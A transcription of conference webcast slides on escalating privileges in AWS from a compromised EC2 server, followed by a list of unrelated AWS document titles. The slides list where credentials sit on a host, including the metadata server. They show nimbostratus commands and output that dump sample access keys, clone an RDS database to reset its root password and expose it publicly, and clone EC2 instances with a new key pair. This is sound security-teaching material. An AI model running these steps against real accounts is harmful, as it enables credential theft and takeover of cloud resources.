Amazon AWS Security Basics
|
|
|
- Shannon Riley
- 10 years ago
- Views:
Transcription
1 Amazon AWS Security Basics Escalating privileges from EC2 Andrés Riancho TagCube CTO BlackHat Webcasts
2 Agenda Privilege escalation: Classic vs. Cloud The hacker s perspective AWS credentials and instance profiles Privilege escalation examples IAM from the developer s perspective Hacme cloud: The nimbostratus tool Conclusions
3 Privilege escalation Because gaining access to only one server is not fun enough
4 Non-cloud network privilege escalation After gaining access to a server intruders use different techniques to access other resources in the target network: rsh / rlogin / rexec: hopefully nobody uses this anymore! Hard-coded credentials SSH and keys without password
5 Privilege escalation in Amazon EC2 An attacker can still use the previous privilege escalation techniques EC2 servers usually connect to other AWS services, so AWS credentials are present in the system (hard-coded, environment variables, instance profiles, etc.). Misconfigured IAM profiles can be used to elevate the AWS user s privileges, perform DoS attacks and access private information.
6 AWS privilege escalation examples The attacker s perspective
7 Credentials at AWS_* environment variables Compromised an EC2 server where do I find the AWS credentials? AWS_ACCESS_KEY and AWS_SECRET_ACCESS_KEY environment variables Hard-coded into the application source ~/.aws/credentials ~/.boto ~/.fog Each time an EC2 instance starts, AWS creates a "meta-data server" which is only accessible/routed for that instance. If an instance profile was configured credentials can be found at:
8 nimbostratus --dump-credentials Nimbostratus knows how to retrieve credentials from: AWS_ACCESS_KEY and AWS_SECRET_ACCESS_KEY environment variables ~/.boto Instance profile (meta-data server) nimbostratus --dump-credentials Found credentials Access key: AKIAJSL6ZPLEGE6QKD2Q Secret key: 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
9 Privilege enumeration with nimbostratus nimbostratus dump-permissions --access-key=... --secret-key=... Starting dump-permissions These credentials belong to low_privileged_user, not to the root account Getting access keys for user low_privileged_user User for key AKIAIV...J6KVA is low_privileged_user {u'statement': [{u'action': u'sqs:*', u'effect': u'allow', u'resource': u'*', u'sid': u'stmt '}]}
10 Get root access to RDS-MySQL rds:* permissions Enumerate RDS instances
11 Get root access to RDS-MySQL Original MySQL connection
12 Get root access to RDS-MySQL 1. Create RDS DB snapshot Original
13 Get root access to RDS-MySQL Original 2. Restore RDS snapshot Clone
14 Get root access to RDS-MySQL Original 3. Change RDS root password Clone
15 Get root access to RDS-MySQL Original 4. MySQL connection using new root password Clone
16 Get root access to RDS-MySQL -v snapshot-rds --access-key AKIAJSL6ZPLEGE6QKD2Q --secret-key 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 --password foolmeonce --rds-name nimbostratus --region ap-southeast-1 Starting snapshot-rds Waiting for snapshot to complete in AWS... (this takes at least 5m) Waiting... Waiting for restore process in AWS... (this takes at least 5m) Waiting... Creating a DB security group which allows connections from any location and applying it to the newly created RDS instance. Anyone can connect to this MySQL instance at: - Host: restored-sjnrpnubt.cuwm5qpy.ap-southeast-1.rds.amazonaws.com - Port: 3306 Using root: mysql -u root -pfoolmeonce -h restored-sjnrpnubt...rds.amazonaws.com
17 Gaining access to EC2 servers ec2:* permissions Enumerate EC2 instances
18 Gaining access to EC2 servers - ec2:* Original SSH connection
19 Gaining access to EC2 servers - ec2:* 1. Create new key pair Original
20 Gaining access to EC2 servers - ec2:* Original 2. Spawn new EC2 instance using new key pair and same AMI, user-data, etc.
21 Gaining access to EC2 servers - ec2:* Original Clone
22 Gaining access to EC2 servers - ec2:* Original 3. SSH connection using new key pair Clone
23 IAM: Identity and Access Management AWS s security core
24 IAM: Identity and Access Management As an Amazon AWS architect/developer you use IAM to manage: Users and groups Roles Permissions Access keys (user API keys) IAM s most common use case is to grant access to AWS services: "John can read and write to all S3 buckets" IAM is also used to restrict access to IAM iam:* is AWS root
25 Example IAM policies Read only to various AWS services All EC2 access { } "Version": " ", "Statement": [ { "Action": [ "autoscaling:describe*", "ec2:describe*", "elasticache:describe*", "elasticloadbalancing:describe*", "rds:describe*", "rds:listtagsforresource", ], "Effect": "Allow", "Resource": "*" } ] { } "Version": " ", "Statement": [ { "Action": "ec2:*", "Effect": "Allow", "Resource": "*" } ]
26 Gain AWS root access Which IAM policy would allow an attacker to gain AWS root? { "Statement": [{ "Sid": "Stmt ", "Action": "sns:*", "Effect": "Allow", "Resource": "*"}, { "Statement": [{ "Sid": "Stmt ", "NotAction": "*", "Effect": "Allow", "Resource": "*"}, ]} {"Sid": "Stmt ", "Action": ["s3:*","*"], "Effect": "Allow", "Resource": "*"}, ]} {"Sid": "Stmt ", "Action": ["iam:putuserpolicy"], "Effect": "Allow", "Resource": "*"}, Source: Intrusion detection in cloud re:invent 2013
27 Gain AWS root access Where s the bug in this IAM profile? { "Statement": [{ "Sid": "Stmt ", "Action": "ec2:*", "Effect": "Allow", "Resource": "*"}, ]} {"Sid": "Stmt ", "Action": ["s3:*", "iam:passrole"], "Effect": "Allow", "Resource": "*"}, Source: Intrusion detection in cloud re:invent 2013
28 Do it yourself!
29 DIY: nimbostratus(-target) example.com
30 DIY: nimbostratus(-target) fab deploy Launching Django frontend instance Creating keypair: django_frontend_nimbostratus Removing IAM instance profile "django_frontend_nimbostratus" Waiting for role django_frontend_nimbostratus to be available... Waiting for instance to start... Checking if instance was correctly configured (this usually takes 5min) Instance did not boot yet... Successfully started django_frontend_nimbostratus You can connect to it via SSH and HTTP: ssh -i django_frontend_nimbostratus.pem Spawning a new RDS instance, this takes at least 10min! Waiting... Waiting... Successfully started RDS instance.
31 Conclusions Developers are building apps on the cloud We should all learn more about this technology! AWS has a free-tier which you can use to learn. No excuses! Embrace change, embrace the future Most vulnerabilities and mis-configurations exploited today have fixes and/or workarounds, read the docs! Check out my BlackHat slides and paper for more information
32
Tibbr Installation Addendum for Amazon Web Services
Tibbr Installation Addendum for Amazon Web Services Version 1.1 February 17, 2013 Table of Contents Introduction... 3 MySQL... 3 Choosing a RDS instance size... 3 Creating the RDS instance... 3 RDS DB
MANAGE YOUR AMAZON AWS ASSETS USING BOTO
Who am I? Chirag Jog CTO, Clogeny Technologies - Cloud Computing Experts Python developer Open Source Contributor Linux Test Project, Linux Kernel, boto etc Innovation Execution Solution Delivered MANAGE
Threat Modeling Cloud Applications
Threat Modeling Cloud Applications What You Don t Know Will Hurt You Scott Matsumoto Principal Consultant [email protected] Software Confidence. Achieved. www.cigital.com [email protected] +1.703.404.9293
Chapter 9 PUBLIC CLOUD LABORATORY. Sucha Smanchat, PhD. Faculty of Information Technology. King Mongkut s University of Technology North Bangkok
CLOUD COMPUTING PRACTICE 82 Chapter 9 PUBLIC CLOUD LABORATORY Hand on laboratory based on AWS Sucha Smanchat, PhD Faculty of Information Technology King Mongkut s University of Technology North Bangkok
Online Backup Guide for the Amazon Cloud: How to Setup your Online Backup Service using Vembu StoreGrid Backup Virtual Appliance on the Amazon Cloud
Online Backup Guide for the Amazon Cloud: How to Setup your Online Backup Service using Vembu StoreGrid Backup Virtual Appliance on the Amazon Cloud Here is a step-by-step set of instructions to get your
Zend Server Amazon AMI Quick Start Guide
Zend Server Amazon AMI Quick Start Guide By Zend Technologies www.zend.com Disclaimer This is the Quick Start Guide for The Zend Server Zend Server Amazon Machine Image The information in this document
Alfresco Enterprise on AWS: Reference Architecture
Alfresco Enterprise on AWS: Reference Architecture October 2013 (Please consult http://aws.amazon.com/whitepapers/ for the latest version of this paper) Page 1 of 13 Abstract Amazon Web Services (AWS)
www.boost ur skills.com
www.boost ur skills.com AWS CLOUD COMPUTING WORKSHOP Write us at [email protected] BOOSTURSKILLS No 1736 1st Amrutha College Road Kasavanhalli,Off Sarjapur Road,Bangalore-35 1) Introduction &
Amazon Web Services Student Tutorial
Amazon Web Services Free Usage Tier Elastic Compute Cloud Amazon Web Services Student Tutorial David Palma Joseph Snow CSC 532: Advanced Software Engineering Louisiana Tech University October 4, 2012 Amazon
AWS Account Setup and Services Overview
AWS Account Setup and Services Overview 1. Purpose of the Lab Understand definitions of various Amazon Web Services (AWS) and their use in cloud computing based web applications that are accessible over
AdWhirl Open Source Server Setup Instructions
AdWhirl Open Source Server Setup Instructions 11/09 AdWhirl Server Setup Instructions The server runs in Amazon s web cloud. To set up the server, you need an Amazon Web Services (AWS) account and the
TECHNOLOGY WHITE PAPER Jun 2012
TECHNOLOGY WHITE PAPER Jun 2012 Technology Stack C# Windows Server 2008 PHP Amazon Web Services (AWS) Route 53 Elastic Load Balancing (ELB) Elastic Compute Cloud (EC2) Amazon RDS Amazon S3 Elasticache
ArcGIS 10.3 Server on Amazon Web Services
ArcGIS 10.3 Server on Amazon Web Services Copyright 1995-2015 Esri. All rights reserved. Table of Contents Introduction What is ArcGIS Server on Amazon Web Services?............................... 5 Quick
Cloud Models and Platforms
Cloud Models and Platforms Dr. Sanjay P. Ahuja, Ph.D. 2010-14 FIS Distinguished Professor of Computer Science School of Computing, UNF A Working Definition of Cloud Computing Cloud computing is a model
GreenSQL AWS Deployment
GreenSQL AWS Deployment Table of Contents 2 Table of Contents... 3 from Amazon's Marketplace... 3 from Amazon's EC2 Console... 3 Amazon Launch Wizard walkthrough... 4 Post-installation procedures... 7
Building Energy Security Framework
Building Energy Security Framework Philosophy, Design, and Implementation Building Energy manages multiple subsets of customer data. Customers have strict requirements for regulatory compliance, privacy
TECHNOLOGY WHITE PAPER Jan 2016
TECHNOLOGY WHITE PAPER Jan 2016 Technology Stack C# PHP Amazon Web Services (AWS) Route 53 Elastic Load Balancing (ELB) Elastic Compute Cloud (EC2) Amazon RDS Amazon S3 Elasticache CloudWatch Paypal Overview
Application Security Best Practices. Matt Tavis Principal Solutions Architect
Application Security Best Practices Matt Tavis Principal Solutions Architect Application Security Best Practices is a Complex topic! Design scalable and fault tolerant applications See Architecting for
Elastic Detector on Amazon Web Services (AWS) User Guide v5
Elastic Detector on Amazon Web Services (AWS) User Guide v5 This guide is intended for Elastic Detector users on AWS. Elastic Detector is available as SaaS or deployed as a virtual appliance through an
19.10.11. Amazon Elastic Beanstalk
19.10.11 Amazon Elastic Beanstalk A Short History of AWS Amazon started as an ECommerce startup Original architecture was restructured to be more scalable and easier to maintain Competitive pressure for
Nessus Enterprise for Amazon Web Services (AWS) Installation and Configuration Guide. July 16, 2014 (Revision 2)
Nessus Enterprise for Amazon Web Services (AWS) Installation and Configuration Guide July 16, 2014 (Revision 2) Table of Contents Introduction... 3 Requirements... 3 Standards and Conventions... 3 Nessus
AWS Account Management Guidance
AWS Account Management Guidance Introduction Security is a top priority at AWS. Every service that is offered is tightly controlled and adheres to a strict security standard. This is evident in the security
Amazon WorkDocs. Administration Guide Version 1.0
Amazon WorkDocs Administration Guide Amazon WorkDocs: Administration Guide Copyright 2015 Amazon Web Services, Inc. and/or its affiliates. All rights reserved. Amazon's trademarks and trade dress may not
Managing Multi-Tiered Applications with AWS OpsWorks
Managing Multi-Tiered Applications with AWS OpsWorks Daniele Stroppa January 2015 Contents Contents Abstract Introduction Key Concepts Design Micro-services Architecture Provisioning and Deployment Managing
EEDC. Scalability Study of web apps in AWS. Execution Environments for Distributed Computing
EEDC Execution Environments for Distributed Computing 34330 Master in Computer Architecture, Networks and Systems - CANS Scalability Study of web apps in AWS Sergio Mendoza [email protected]
Cloud Computing for Education Workshop
Cloud Computing for Education Workshop 2012 Copyright REZA CURTMOLA, NJIT What Have We Learned So Far? We have learned several cloud applications (Dropbox, Google Docs, Piazza, etc.) Dropbox SugarSync
USER CONFERENCE 2011 SAN FRANCISCO APRIL 26 29. Running MarkLogic in the Cloud DEVELOPER LOUNGE LAB
USER CONFERENCE 2011 SAN FRANCISCO APRIL 26 29 Running MarkLogic in the Cloud DEVELOPER LOUNGE LAB Table of Contents UNIT 1: Lab description... 3 Pre-requisites:... 3 UNIT 2: Launching an instance on EC2...
Cloud Computing. AWS a practical example. Hugo Pérez UPC. Mayo 2012
Cloud Computing AWS a practical example Mayo 2012 Hugo Pérez UPC -2- Index Introduction Infraestructure Development and Results Conclusions Introduction In order to know deeper about AWS services, mapreduce
UTILIZING CLOUDCHECKR FOR SECURITY
UTILIZING CLOUDCHECKR FOR SECURITY A guide to security in your AWS Environment Abstract This document outlines steps to properly secure your AWS environment using CloudCheckr. We cover CloudCheckr use
AWS Directory Service. Simple AD Administration Guide Version 1.0
AWS Directory Service Simple AD Administration Guide AWS Directory Service: Simple AD Administration Guide Copyright 2015 Amazon Web Services, Inc. and/or its affiliates. All rights reserved. Amazon's
From Zero to Secure in 1 Minute
From Zero to Secure in 1 Minute Securing IaaS Nir Valtman & Moshe Ferber Black Hat Asia 2015 About us Moshe Ferber Nir Valtman Passionate about information security. Involved in numerous startups and initiatives
Drupal in the Cloud. Scaling with Drupal and Amazon Web Services. Northern Virginia Drupal Meetup
Drupal in the Cloud Scaling with Drupal and Amazon Web Services Northern Virginia Drupal Meetup 3 Dec 2008 Cast of Characters Eric at The Case Foundation: The Client With typical client challenges Cost:
Tcl and Cloud Computing Automation
Tcl and Cloud Computing Automation Tclcloud, Tclwinrm & Cato Patrick Dunnigan Chief Architect, Cloud Sidekick cloudsidekick.com @CloudSidekick Tclcloud - Tcl api for AWS public cloud / Ecualyptus private
Scalable Application. Mikalai Alimenkou http://xpinjection.com 11.05.2012
Scalable Application Development on AWS Mikalai Alimenkou http://xpinjection.com 11.05.2012 Background Java Technical Lead/Scrum Master at Zoral Labs 7+ years in software development 5+ years of working
Introduction to Cloud Computing on Amazon Web Services (AWS) with focus on EC2 and S3. Horst Lueck
Introduction to Cloud Computing on Amazon Web Services (AWS) with focus on EC2 and S3 Horst Lueck 2011-05-17 IT Pro Forum http://itproforum.org Thanks to Open Office Impress The Cloud the Name The 90s
Cloud Computing. Adam Barker
Cloud Computing Adam Barker 1 Overview Introduction to Cloud computing Enabling technologies Different types of cloud: IaaS, PaaS and SaaS Cloud terminology Interacting with a cloud: management consoles
Intrusion Detection in the Cloud
Intrusion Detection in the Cloud Greg Roth, AWS Identity & Access Management Don Bailey, AWS Security November 14 th, 2013 2013 Amazon.com, Inc. and its affiliates. All rights reserved. May not be copied,
Chapter 11 Cloud Application Development
Chapter 11 Cloud Application Development Contents Motivation. Connecting clients to instances through firewalls. Chapter 10 2 Motivation Some of the questions of interest to application developers: How
Computer Forensics and Incident Response in the Cloud. Stephen Coty AlertLogic, Inc. @Twitter AlertLogic_ACID
Computer Forensics and Incident Response in the Cloud SESSION ID: ANF-T07A Stephen Coty AlertLogic, Inc. @Twitter AlertLogic_ACID Why forensics in the cloud? Cloud market revenue will increase at a 36%
Introduction to DevOps on AWS
Introduction to DevOps on AWS David Chapman December 2014 Contents Contents Abstract Introduction Agile Evolution to DevOps Infrastructure as Code AWS CloudFormation AWS AMI Continuous Deployment AWS CodeDeploy
EXTENDING SINGLE SIGN-ON TO AMAZON WEB SERVICES
pingidentity.com EXTENDING SINGLE SIGN-ON TO AMAZON WEB SERVICES Best practices for identity federation in AWS Table of Contents Executive Overview 3 Introduction: Identity and Access Management in Amazon
Managing Your Microsoft Windows Server Fleet with AWS Directory Service. May 2015
Managing Your Microsoft Windows Server Fleet with AWS Directory Service May 2015 2015, Amazon Web Services, Inc. or its affiliates. All rights reserved. Notices This document is provided for informational
Cloud Security Through Threat Modeling. Robert M. Zigweid Director of Services for IOActive
Cloud Security Through Threat Modeling Robert M. Zigweid Director of Services for IOActive 1 Key Points Introduction Threat Model Primer Assessing Threats Mitigating Threats Sample Threat Model Exercise
SECURITY IS JOB ZERO. Security The Forefront For Any Online Business Bill Murray Director AWS Security Programs
SECURITY IS JOB ZERO Security The Forefront For Any Online Business Bill Murray Director AWS Security Programs Security is Job Zero Physical Security Network Security Platform Security People & Procedures
CernVM Online and Cloud Gateway a uniform interface for CernVM contextualization and deployment
CernVM Online and Cloud Gateway a uniform interface for CernVM contextualization and deployment George Lestaris - Ioannis Charalampidis D. Berzano, J. Blomer, P. Buncic, G. Ganis and R. Meusel PH-SFT /
Design for Failure High Availability Architectures using AWS
Design for Failure High Availability Architectures using AWS Harish Ganesan Co founder & CTO 8KMiles www.twitter.com/harish11g http://www.linkedin.com/in/harishganesan Sample Use Case Multi tiered LAMP/LAMJ
This computer will be on independent from the computer you access it from (and also cost money as long as it s on )
Even though you need a computer to access your instance, you are running on a machine with different capabilities, great or small This computer will be on independent from the computer you access it from
OnCommand Cloud Manager 2.2 Storage System Management Guide
OnCommand Cloud Manager 2.2 Storage System Management Guide March 2016 215-10912_A0 [email protected] Table of Contents 3 Contents Deciding whether to use this guide... 5 Product overview... 6 Cloud
Technology and Cost Considerations for Cloud Deployment: Amazon Elastic Compute Cloud (EC2) Case Study
Creating Value Delivering Solutions Technology and Cost Considerations for Cloud Deployment: Amazon Elastic Compute Cloud (EC2) Case Study Chris Zajac, NJDOT Bud Luo, Ph.D., Michael Baker Jr., Inc. Overview
Eucalyptus 4.2 IAM Guide
Eucalyptus 4.2 IAM Guide 2015-12-01 Eucalyptus Systems Eucalyptus Contents 2 Contents IAM Overview...3 Work with IAM...4 Manage Identities Overview...5 Special Identities...5 Authentication and Access
PCI COMPLIANCE ON AWS: HOW TREND MICRO CAN HELP
SOLUTION BRIEF PCI COMPLIANCE ON AWS: HOW TREND MICRO CAN HELP The benefits of cloud computing are clear and compelling: no upfront investment, low ongoing costs, flexible capacity and fast application
Smartphone Pentest Framework v0.1. User Guide
Smartphone Pentest Framework v0.1 User Guide 1 Introduction: The Smartphone Pentest Framework (SPF) is an open source tool designed to allow users to assess the security posture of the smartphones deployed
Simone Brunozzi, AWS Technology Evangelist, APAC. Fortress in the Cloud
Simone Brunozzi, AWS Technology Evangelist, APAC Fortress in the Cloud AWS Cloud Security Model Overview Certifications & Accreditations Sarbanes-Oxley (SOX) compliance ISO 27001 Certification PCI DSS
DISTRIBUTED SYSTEMS [COMP9243] Lecture 9a: Cloud Computing WHAT IS CLOUD COMPUTING? 2
DISTRIBUTED SYSTEMS [COMP9243] Lecture 9a: Cloud Computing Slide 1 Slide 3 A style of computing in which dynamically scalable and often virtualized resources are provided as a service over the Internet.
How to Grow and Transform your Security Program into the Cloud
How to Grow and Transform your Security Program into the Cloud Wolfgang Kandek Qualys, Inc. Session ID: SPO-207 Session Classification: Intermediate Agenda Introduction Fundamentals of Vulnerability Management
(In-)Security of Backend-as-a-Service
(In-)Security of Backend-as-a-Service Siegfried Rasthofer (TU Darmstadt / CASED) Steven Arzt (TU Darmstadt / CASED) Robert Hahn (TU Darmstadt) Max Kolhagen (TU Darmstadt) Eric Bodden (Fraunhofer SIT /
Appendix to; Assessing Systemic Risk to Cloud Computing Technology as Complex Interconnected Systems of Systems
Appendix to; Assessing Systemic Risk to Cloud Computing Technology as Complex Interconnected Systems of Systems Yacov Y. Haimes and Barry M. Horowitz Zhenyu Guo, Eva Andrijcic, and Joshua Bogdanor Center
Immersion Day. Creating an Elastic Load Balancer. Rev 2015-01
Rev 2015-01 Table of Contents Overview...3 Launch a Second Web Server...4 Create an ELB...6 Copyright 2015, Amazon Web Services, All Rights Reserved Page 2 Overview This lab will walk the user through
Securing Privileges in the Cloud. A Clear View of Challenges, Solutions and Business Benefits
A Clear View of Challenges, Solutions and Business Benefits Introduction Cloud environments are widely adopted because of the powerful, flexible infrastructure and efficient use of resources they provide
Security Landscape of Cloud Computing
Security Landscape of Cloud Computing Amrith Nawoor Sales Consulting Team Leader East Africa & SADC 1 This document is for informational purposes. It is not a commitment to deliver any material, code,
Running Oracle on the Amazon Cloud
Running Oracle on the Amazon Cloud Bryan Stroble RMOUG Training Days February 7, 2014 Oracle Experts, Easy to Work With Oracle experts Oracle Database Technology Consulting Oracle E-Business Suite Applications
Storage and Disaster Recovery
Storage and Disaster Recovery Matt Tavis Principal Solutions Architect The Business Continuity Continuum High Data Backup Disaster Recovery High, Storage Backup and Disaster Recovery form a continuum of
319 MANAGED HOSTING TECHNICAL DETAILS
319 MANAGED HOSTING TECHNICAL DETAILS 319 NetWorks www.319networks.com Table of Contents Architecture... 4 319 Platform... 5 319 Applications... 5 319 Network Stack... 5 319 Cloud Hosting Technical Details...
Getting Started with Hadoop with Amazon s Elastic MapReduce
Getting Started with Hadoop with Amazon s Elastic MapReduce Scott Hendrickson [email protected] http://drskippy.net/projects/emr-hadoopmeetup.pdf Boulder/Denver Hadoop Meetup 8 July 2010 Scott Hendrickson
Opsview in the Cloud. Monitoring with Amazon Web Services. Opsview Technical Overview
Opsview in the Cloud Monitoring with Amazon Web Services Opsview Technical Overview Page 2 Opsview In The Cloud: Monitoring with Amazon Web Services Contents Opsview in The Cloud... 3 Considerations...
VX 9000E WiNG Express Manager INSTALLATION GUIDE
VX 9000E WiNG Express Manager INSTALLATION GUIDE 2 VX 9000E WiNG Express Manager Service Information If you have a problem with your equipment, contact support for your region. Support and issue resolution
Security Essentials & Best Practices
Security Essentials & Best Practices Overview Overview of the AWS cloud security concepts such as the AWS security center, Shared Responsibility Model, and Identity and Access Management. 1 AWS Security
SkySQL Data Suite. A New Open Source Approach to MySQL Distributed Systems. Serge Frezefond V1212.01
SkySQL Data Suite A New Open Source Approach to MySQL Distributed Systems Serge Frezefond V1212.01 Agenda SkySQL Cloud Data Suite Architecture SkySQL Cloud Data Suite on Amazon EC2 Components for automated
Installation Guide on Cloud Platform
FOR WINDOWS DOCUMENT ID: ADC00806-01-0700-01 LAST REVISED: October 08, 2014 Copyright 2002-2014 by Appeon Corporation. All rights reserved. This publication pertains to Appeon software and to any subsequent
Web Application Firewall
Web Application Firewall Getting Started Guide August 3, 2015 Copyright 2014-2015 by Qualys, Inc. All Rights Reserved. Qualys and the Qualys logo are registered trademarks of Qualys, Inc. All other trademarks
Cloud Security:Threats & Mitgations
Cloud Security:Threats & Mitgations Vineet Mago Naresh Khalasi Vayana 1 What are we gonna talk about? What we need to know to get started Its your responsibility Threats and Remediations: Hacker v/s Developer
Amazon Web Services EC2 & S3
2010 Amazon Web Services EC2 & S3 John Jonas FireAlt 3/2/2010 Table of Contents Introduction Part 1: Amazon EC2 What is an Amazon EC2? Services Highlights Other Information Part 2: Amazon Instances What
Creating an ESS instance on the Amazon Cloud
Creating an ESS instance on the Amazon Cloud Copyright 2014-2015, R. James Holton, All rights reserved (11/13/2015) Introduction The purpose of this guide is to provide guidance on creating an Expense
Deploy XenApp 7.5 and 7.6 and XenDesktop 7.5 and 7.6 with Amazon VPC
XenApp 7.5 and 7.6 and XenDesktop 7.5 and 7.6 Deploy XenApp 7.5 and 7.6 and XenDesktop 7.5 and 7.6 with Amazon VPC Prepared by: Peter Bats Commissioning Editor: Linda Belliveau Version: 5.0 Last Updated:
AWS testing results. Testing Procedure. Prepare Target Machine. Prepare modified mosquitto configuration. /etc/mosquitto/mosquitto.
AWS testing results Target: XXXXX XXXXXX Memory 2 gig cpu Dual Core: Intel(R) Xeon(R) CPU E5645 @ 2.40GHz Testing Procedure Prepare Target Machine Prepare modified mosquitto configuration Install Anecdotal
Using The Hortonworks Virtual Sandbox
Using The Hortonworks Virtual Sandbox Powered By Apache Hadoop This work by Hortonworks, Inc. is licensed under a Creative Commons Attribution- ShareAlike3.0 Unported License. Legal Notice Copyright 2012
What s Wrong with Information Security Today? You are looking in the wrong places for the wrong things.
What s Wrong with Information Security Today? You are looking in the wrong places for the wrong things. AGENDA Current State of Information Security Data Breach Statics Data Breach Case Studies Why current
FREE computing using Amazon EC2
FREE computing using Amazon EC2 Seong-Hwan Jun 1 1 Department of Statistics Univ of British Columbia Nov 1st, 2012 / Student seminar Outline Basics of servers Amazon EC2 Setup R on an EC2 instance Stat
Running Oracle Applications on AWS
Running Oracle Applications on AWS Bharath Terala Sr. Principal Consultant Apps Associates LLC June 09, 2014 Copyright 2014. Apps Associates LLC. 1 Agenda About the Presenter About Apps Associates LLC
AWS Service Catalog. User Guide
AWS Service Catalog User Guide AWS Service Catalog: User Guide Copyright 2016 Amazon Web Services, Inc. and/or its affiliates. All rights reserved. Amazon's trademarks and trade dress may not be used in
Deploying Virtual Cyberoam Appliance in the Amazon Cloud Version 10
Deploying Virtual Cyberoam Appliance in the Amazon Cloud Version 10 Document version 1.0 10.6.2.378-13/03/2015 Important Notice Cyberoam Technologies Pvt. Ltd. has supplied this Information believing it
HADOOP BIG DATA DEVELOPER TRAINING AGENDA
HADOOP BIG DATA DEVELOPER TRAINING AGENDA About the Course This course is the most advanced course available to Software professionals This has been suitably designed to help Big Data Developers and experts
EC-Council CAST CENTER FOR ADVANCED SECURITY TRAINING. CAST 619 Advanced SQLi Attacks and Countermeasures. Make The Difference CAST.
CENTER FOR ADVANCED SECURITY TRAINING 619 Advanced SQLi Attacks and Countermeasures Make The Difference About Center of Advanced Security Training () The rapidly evolving information security landscape
How To Set Up Wiremock In Anhtml.Com On A Testnet On A Linux Server On A Microsoft Powerbook 2.5 (Powerbook) On A Powerbook 1.5 On A Macbook 2 (Powerbooks)
The Journey of Testing with Stubs and Proxies in AWS Lucy Chang [email protected] Abstract Intuit, a leader in small business and accountants software, is a strong AWS(Amazon Web Services) partner
Amazon Web Services: Overview of Security Processes May 2011
Amazon Web Services: Overview of Security Processes May 2011 (Please consult http://aws.amazon.com/security for the latest version of this paper) 1 Amazon Web Services (AWS) delivers a scalable cloud computing
Storage Solutions in the AWS Cloud. Miles Ward Enterprise Solutions Architect
Storage Solutions in the AWS Cloud Miles Ward Enterprise Solutions Architect Traditional Storage On-Premise Storage Options SAN network-attached block devices: LUNs DAS local block devices (disks) NAS
How AWS Pricing Works
How AWS Pricing Works (Please consult http://aws.amazon.com/whitepapers/ for the latest version of this paper) Page 1 of 15 Table of Contents Table of Contents... 2 Abstract... 3 Introduction... 3 Fundamental
